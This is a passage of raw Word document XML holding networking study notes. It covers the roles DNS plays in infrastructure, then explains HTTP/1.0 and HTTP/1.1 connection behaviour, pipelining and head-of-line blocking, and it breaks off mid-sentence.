              <w:t>Role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C8081C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How DNS Serves It</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="748A8E2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CF6D5C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Service discovery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A34B3F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>A/AAAA/SRV records map service names to endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="5762981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7C0E9E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:lastRenderedPageBreak/>
              <w:t>Global load balancing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496989" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>GeoDNS, latency-based routing, weighted records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="7404225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70B949" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Failover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81220E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Health-checked records, automatic removal of dead endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="2866B0C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A73B3A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>CDN integration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97FA35" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>CNAME/ALIAS to CDN edge, geographic steering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="25A4462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997188" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Security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A525B4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>DNSSEC (integrity), CAA (certificate control), RPZ (blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="3E11CE0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2519BF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Traffic management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596F5A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Weighted routing, canary deployments, A/B testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="239CF9C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199F9C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Multi-region architecture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0CFEF0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>DNS is the first routing decision (which region to direct to)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58282BA7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental mental model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F7B04" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS is the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first network decision</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> in every request. It's a globally distributed, cached, hierarchical routing layer that sits ABOVE your infrastructure. It determines which IP your users reach before your load balancers, proxies, or servers ever see a packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABEF7A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Its strengths:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Universal (every client speaks DNS), globally distributed, heavily cached (highly performant), simple to configure, no client-side changes needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2FD281" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Its weaknesses:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Coarse-grained (per-domain routing, not per-request), slow to change (caching delays propagation), limited intelligence (can't inspect request content), unreliable for real-time updates (client caching is uncontrollable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB7CF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The design principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Use DNS for what it's good at (global routing, service naming, coarse failover) and use other mechanisms (load balancers, service mesh, sidecars) for what DNS can't do well (per-request routing, fast failover, health-aware balancing, session affinity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A12BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP vs HTTPS — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDE688" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="2331CC62">
          <v:rect id="_x0000_i3571" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611AB47" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What HTTP and HTTPS Actually Are (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE47B4A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP (HyperText Transfer Protocol) is an </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-layer protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> that defines how clients and servers communicate — the format of requests, responses, headers, status </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>codes, and the semantics of methods. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stateless, text-based, request-response protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> built on top of TCP (or QUIC for HTTP/3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A9E12" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTPS is not a separate protocol. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP running inside a TLS (Transport Layer Security) tunnel</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. The HTTP protocol itself is unchanged — the same methods, headers, status codes, and semantics. The difference is that before any HTTP byte is exchanged, a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> establishes an encrypted, authenticated channel. All HTTP bytes then flow through this encrypted channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F10B9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The engineering problems these protocols solve are fundamentally different:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E17089" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP solves:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> How do clients and servers communicate structured hypertext documents and API responses over a network — what is the format, semantics, and negotiation mechanism for that communication?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A6FDC2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS additionally solves:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> How do clients know they are talking to the legitimate server (not an impostor)? How is the communication protected from eavesdropping? How is tampering with traffic in transit detected and prevented?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861A19E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Understanding HTTP vs HTTPS deeply requires understanding HTTP's evolution across versions (HTTP/1.0, HTTP/1.1, HTTP/2, HTTP/3), TLS's internal mechanics (handshake, cipher suites, certificate validation), and the specific security guarantees HTTPS provides and — critically — does not provide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1481EF56" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="487A800D">
          <v:rect id="_x0000_i3572" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C76DEA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. HTTP — The Protocol Internals Across Versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D08247" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.0 — The Naive Beginning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12229039" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.0 used a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>new TCP connection for every single request-response pair</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. The sequence for every resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303978C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9C294" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP SYN →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A971B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         ← TCP SYN-ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53E3DD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP ACK →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56597544" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP GET /resource →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4A5B1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                   ← HTTP 200 OK + body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0485580A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP FIN →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F17DB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         ← TCP FIN-ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92E415" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The performance disaster:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A web page with 30 resources (HTML + 29 images, CSS, JS files) requires </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>30 complete TCP connection setups and teardowns</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. Each TCP handshake is 1 RTT. On a 100ms RTT network: 30 × 100ms = </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> just in connection overhead, before transferring a single byte of useful data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5444C3F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Additionally, each new TCP connection starts in </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP slow start</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — the congestion window begins small (typically 10 segments × 1460 bytes = ~14KB) and doubles with each RTT until either packet loss occurs or the congestion avoidance threshold is reached. A connection used for only one request never escapes slow start — it never reaches the network's true bandwidth capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E6F09" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Connection: keep-alive workaround:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Some HTTP/1.0 implementations added a non-standard Connection: keep-alive header, requesting that the TCP connection be kept open after the response. But this was not part of the HTTP/1.0 specification — behavior was inconsistent across implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43968EBA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 — Persistent Connections and Pipelining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE4320" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 (RFC 2616, 1997; updated by RFC 7230-7235, 2014) made persistent connections the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. TCP connections are kept alive after responses unless explicitly closed with Connection: close.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91D607" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The persistent connection model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC953F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50868666" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP Connection Established (once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DEE247" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Request 1 → Response 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B94DD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Request 2 → Response 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA984E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Request 3 → Response 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A1E71D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C2A43" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Connection: close header → TCP Teardown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E2760" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>One TCP connection serves multiple requests. Slow start is amortized — the connection reaches full bandwidth after the first few requests and subsequent requests benefit from a large congestion window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74198250" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 Pipelining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A91B3F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>HTTP/1.1 introduced </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pipelining</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — sending multiple requests without waiting for each response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86EDD2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E5208" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Request 1 →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DADFC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Request 2 →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F887569" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Request 3 →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D2752" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">           ← Response 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA3707" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">           ← Response 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0DD0E5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">           ← Response 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7613DAB9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>This eliminates the idle time between sending a request and receiving the response before sending the next request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BADCDF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Head-of-Line (HOL) Blocking problem — the fundamental HTTP/1.1 failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B845FC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Despite pipelining, HTTP/1.1 requires responses to be returned </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in the same order as requests</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (responses are not tagged with request identifiers). If Request 1 is for a 10MB file and Requests 2 and 3 are for tiny 1KB files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961887A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD5F12" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Request 1 (10MB file) →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F542ED" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Request 2 (1KB file)  →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30157503" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Request 3 (1KB file)  →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236B1AE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                       ← Response 1 (10MB — takes 10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B45E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                       ← Response 2 (1KB — could have been sent in 1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC501F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                       ← Response 3 (1KB — could have been sent in 1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E914CD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Responses 2 and 3 are blocked behind Response 1 — </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
